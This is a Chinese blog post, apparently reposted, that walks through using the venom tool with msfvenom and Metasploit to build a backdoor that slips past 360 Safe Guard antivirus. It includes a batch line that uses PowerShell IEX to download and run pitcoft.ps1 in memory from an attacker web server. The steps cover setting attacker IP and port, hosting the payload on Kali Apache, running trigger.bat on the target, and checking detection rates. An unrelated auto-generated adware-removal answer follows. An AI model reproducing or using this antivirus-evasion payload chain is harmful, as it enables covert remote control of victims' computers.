360safe.php绕过,venom结合Metasploit绕过360安全卫士

原理:msfvenom是msfpayload和msfencode的结合体,利用msfvenom生成shellcode,venom生成工具使用了

一些 Veil-Evasion.py, unicorn.py, powersploit.py 等工具上的技术。但是venom 是基于 bash 编写的,而不是

基于 Python。相比 veil evasion 在 payload 格式方面,它支持的更多[例如 .msi .hta .vbs .ps1 .dll.php .jar .pdf]而这些 veil evasion 都不支持。

1.从Github上下载框架,你可以下载到以下格式:tar.gz OR zipOR git clone2.赋予文件可执行权限:

cd venom-mainsudo chmod -R +x *.sh

sudo chmod -R +x *.py3.安装依赖关系包:

cd auxsudo ./setup.sh

4.运行sudo ./venom.sh

1f50c44012dd00f8200d35a0ee45bfde.png

下载之后会得到一个zip的压缩包,我们用unzip解压即可

ac47ee0df0643af99a035e1c229187be.png

1、运行venom.sh之后我们可以看到msfvenom的界面是这样的:

40c1ce4f3b14fac14043ca095467d02f.png

2、上图这里的模块比较多,有/apk/exe/php/vbs/bat/ 等格式。在这里我以 11号 模块为例:

1d43ff13c6c1854498c44024ad1dfb68.png

3、在下方输入 11 ,然后按回车键:

900ed7ee0ac1ee953e3074ac929d93ce.png

4、接下来会弹出一个窗口,要求你填写攻击者的 IP 、 端口以及后门名称:

0eef26ab0deb31850ed9b13a30389f6f.png

d522fc1a2390e013dab2ecea819ab187.png

dca72f0cc37c3bc0f93bc5501d70aa22.png

5、在接下来我们要填写后门 选择监听模块类型:

f9836d98a9a36dc32c8d4398b01a7bc5.png

选择完后点击确定

6、在目录我们可以查看 outoput 输出文件:

966ff780a8c416b0d77ffdb8bef85fff.png

两个文件分别是 pitcoft.ps1和trigger.bat

8、这里选择msf的后门模块,选择完后会自动帮你设置相关参数:

475846d0744ed03320d08710024900ac.png

0a46cf1b7ce543c30d7f3a6b97d9b3ce.png

好,我们看到我们的msf已经准备就绪了

b1b99c2be22c1e5a81258c5408f6221a.png

9、下面,我们简单查看下 bat 文件的内容。这里需要我们把 pitcoft.ps1 文件,放到 web 服务器上。 让 powershell去远程下载木马文件:

1 :: powershell template | Author: r00t-3xp10it2 :: Matthew Graeber -DownloadString3 :: Download/execute payload inRAM4 :: ---

5 [url=home.php?mod=space&uid=46675]@echo[/url] off6 echo [*] Please wait, preparing software ...7 powershell.exe IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.105/pitcoft.ps1‘)

10、开启 kali 下的 apache 服务:

1 service apache2 start

f7aab61af1ab5a4c0aaee4161eb31908.png

11、将 pitcoft.ps1丢到 /var/www/ 目录下,以便让木马文件访问攻击者 web 地址:

f535e00144145cc3af3b8e8a6391ce1a.png

12、我们只需要 trigger.bat 文件,到目标系统运行一次即可:

2f21d9a61d7c2201388bc230c5119c47.png

ea68b9095d635104a7a30c2548098871.png

可以看到已经成功建立会话了。

最后我们来看一下我们的免杀问题

360安全卫士检测如下:

20b23423c598d5b5001dbe7f756fad08.png

VirSCAN.org-多引擎在线扫描结果:

bd0dbe83ebef0e17d1d952916614c595.png

原文:http://www.cnblogs.com/Pitcoft/p/6309539.html

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
根据提供的引用内容,你的电脑遇到了一个广告软件的问题。恶意软件可能通过多种途径进入计算机,例如点击恶意链接、下载未知来源的软件或访问感染的网站。正因为如此,我们需要采取一些措施来解决这个问题。 首先,你可以尝试使用一款专业的杀毒软件对电脑进行全面扫描。你已经安装了瑞星杀毒软件、奇虎360杀毒软件、360卫士和百度卫士,但它们似乎无法解决问题。在这种情况下,我建议你换一个杀毒软件,例如火绒、金山毒霸等。这些杀毒软件可以帮助你检测和清除恶意软件。 另外,你还可以通过卸载一些可疑的软件或浏览器插件来解决问题。在控制面板中,找到并卸载你不熟悉或可疑的软件。对于浏览器插件,你可以打开浏览器的设置,找到插件或扩展管理页面,并禁用或删除可疑插件。 此外,你还可以尝试重置浏览器设置。打开浏览器的设置,找到恢复默认设置或重置设置的选项,并进行操作。这将恢复浏览器的默认设置,包括删除恶意设置和恶意扩展。 最后,为了避免再次受到广告软件的侵扰,我建议你遵循以下几点: 1. 注意点击链接,尤其是来自不信任或未知来源的链接。 2. 谨慎下载和安装软件,尽量从官方网站或可信的来源下载。 3. 定期更新和使用杀毒软件,确保其数据库是最新的。 4. 经常清理浏览器缓存和Cookie,以减少广告软件的机会。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值